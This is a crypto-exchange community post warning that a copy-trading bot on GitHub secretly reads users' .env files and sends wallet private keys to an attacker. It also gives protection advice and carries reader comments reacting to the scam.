2025-12-21 03:44:37

Recently, the security community discovered a serious vulnerability: a well-known prediction platform's copy trading robot contains malicious code hidden in its GitHub repository.

The situation is as follows - once the user runs this program, it will automatically read the ".env" file on the computer. It seems harmless, right? The problem is that many developers store their wallet private keys in this file. Once read, the private keys are immediately sent to the hacker's server, and your funds are gone.

What's even more heartbreaking is that the author of this program keeps revising the code and uploading it to GitHub repeatedly, making it seem like they are continuously optimizing the functionality. In reality? Each update is improving the method of stealing private keys, as if they are "polishing their tools".

The concealment of this type of attack is particularly strong — the code looks normal, and the functions work, but secretly your core assets have already been sold. This makes it very easy for newcomers who are just entering the space to fall for it.

**Protection Advice:** Before downloading any trading bot, it's best to have someone who understands code review the GitHub source code for you; never store your private key in configuration files like .env; using multi-signature wallets and hardware wallets can significantly reduce risk. In the world of Web3, security awareness is the best firewall.

View Original

This page may contain third-party content, which is provided for information purposes only (not representations/warranties) and should not be considered as an endorsement of its views by Gate, nor as financial or professional advice. See Disclaimer for details.

18 Likes

Reward
18
9
Repost
Share

Comment

0/400

TokenTherapist

· 13h ago

Wow, they dare to blatantly modify the code like this, how funny. Seriously, people who put their Private Key in env need to reflect on this. Another story of a "get rich through copy trading" dream shattered. This is why I never touch strangers' stuff on GitHub. Every time there's talk about reviewing the code, but how many people actually look at it? Hardware wallets are really eternal, this kind of thing is completely cut off. Newbies are too easily played people for suckers, security awareness needs to be built up from scratch.

View OriginalReply0

tx_or_didn't_happen

· 12-22 20:58

Wow, this Hacker really knows how to play, modifying code while stealing keys, secretly polishing his tools for crime.

View OriginalReply0

NullWhisperer

· 12-22 13:23

ngl the .env trick is almost too predictable at this point... been seeing variants of this for years tbh. what gets me is the repeated commits thing, like mate, if you're exfiltrating keys at least try to hide it

Reply0

PuzzledScholar

· 12-21 04:12

Wow, this is too harsh, GitHub has now become a tool for others The guys who put their Private Key in .env must be crying now It's that old trick of changing disguises and repeatedly uploading, which can indeed fool a lot of newbies Hardware wallets really need to be popularized, otherwise we'll be played for suckers sooner or later Looks like I need to find a reliable coder to review the code before I dare to use it No wonder they say Web3 is a game of trust, it's so hard to guard against

View OriginalReply0

LiquidityWitch

· 12-21 04:12

Damn, here we go again with this trap, running the Private Key in the open is really outrageous. This is why I never run other people's Bots; writing my own scripts is way better. Newbie, wake up! Running without reviewing the source code is truly reckless. It's always like this; they talk beautifully but secretly steal money. A hardware wallet is really a standard requirement; how can there still be people who don't use one? You have to make it a habit to check those repos on GitHub, or you'll lose your hard-earned money.

View OriginalReply0

MEVHunterWang

· 12-21 04:10

What the heck, here comes the trap again. People who put their Private Key in env really need to reflect on themselves. This is why I advise those around me to use a hardware wallet; really, don't save on this. You can't skimp on code reviews; things on GitHub aren't necessarily reliable. Newbies are the most likely to fall for this, thinking it's just a normal feature iteration. Multi-signature Wallets are really nice; even if you get hacked, they can't empty all your funds. This kind of covert attack is truly disgusting; it seems normal on the surface but secretly empties you out. You need to be more vigilant; the trust cost in Web3 is too high.

View OriginalReply0

SchrodingerAirdrop

· 12-21 04:03

Damn, is it this trick again? The code looks fine, but they turn around and steal your wallet. The private key plaintext is stored in the env, really deserves it. Those fox tails exposed on GitHub will be caught sooner or later, just afraid of those hidden ones. Newbies should really not mess around, hardware wallets are really not expensive. In this day and age, you have to find someone to review everything before you dare to run it. A typical Trojan, perfect functionality but the private key is gone. Makes me think of that wave of contract honeypots from two years ago, same trick but different soup.

View OriginalReply0

BrokenRugs

· 12-21 03:58

Damn, here we go again, there are really traps everywhere on GitHub Those who put their Private Key in .env must be really reckless That's why I only use a hardware wallet, it's really exhausting Code reviews really can't be skipped, newbies, please be more aware This generation of Hackers is too competitive, their methods are really varied

View OriginalReply0

FalseProfitProphet

· 12-21 03:55

What the hell, they've dug out another scam product, GitHub has really become a den of thieves Those who put their Private Key in .env should really reflect on this, isn't this common sense? This guy changes code like a pro, clearly a professional level Isn't a hardware wallet nice? Why play with fire like this? Those making quick money with such methods will end up in jail sooner or later Newbies are really easy to fall for this, no wonder the scene is so chaotic.

View OriginalReply0